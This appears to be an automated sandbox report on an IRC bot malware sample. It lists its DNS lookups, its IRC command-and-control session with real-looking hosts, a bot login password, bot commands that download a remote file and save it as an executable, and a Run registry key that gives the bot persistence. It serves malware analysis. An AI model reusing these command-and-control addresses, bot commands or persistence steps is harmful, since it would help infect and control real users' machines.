Unknown Connections
Host By Name:
Requested Host: home-off-d5f0ac
Resulting Address: 172.16.2.61
Requested Host: sip4.voipkosovasite.com
Resulting Address: 82.114.87.46
Connection Established: 0
Socket: 0
Outgoing Connections
IRC Data
User Name: XP-5101
Host Name: *
Server Name:
Real Name: HOME-OFF-D5F0AC
Nick Name: [00|USA|169352]
Non RFC Conform: 1
Channel
Name: #!a!
Topic Deleted: :.msn.stop|.msn.msg foto? http://xhena.xh.ohost.de/viewimage.php?=
Private Message Deleted
Value: :d-!auth@barki.com PRIVMSG [00|USA|169352] :.login mamajokero -s
Value: :d-!auth@barki.com PRIVMSG [00|USA|169352] :.r.getfile http://82.114.87.46/set.jpg c:/sd.exe 1 -s
Notice Message Deleted
Value: :irc.priv8net.com NOTICE AUTH :*** Looking up your hostname…
Value: :irc.priv8net.com NOTICE AUTH :*** Couldn’t resolve your hostname; using your IP address instead
Transport Protocol: TCP
Remote Address: 82.114.87.46
Remote Port: 1868
Protocol: IRC
Connection Established: 1
Socket: 1656
Other details
The following port was open in the system:
Port Protocol Process
1052 TCP winudpmgr.exe (%Windir%winudpmgr.exe)
Registry Modifications
The newly created Registry Value is:
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
Windows UDP Control Center = “winudpmgr.exe”
so that winudpmgr.exe runs every time Windows starts
Memory Modifications
There were new processes created in the system:
Process Name Process Filename Main Module Size
winudpmgr.exe %Windir%winudpmgr.exe 307.200 bytes
[filename of the sample #1] [file and pathname of the sample #1] 307.200 bytes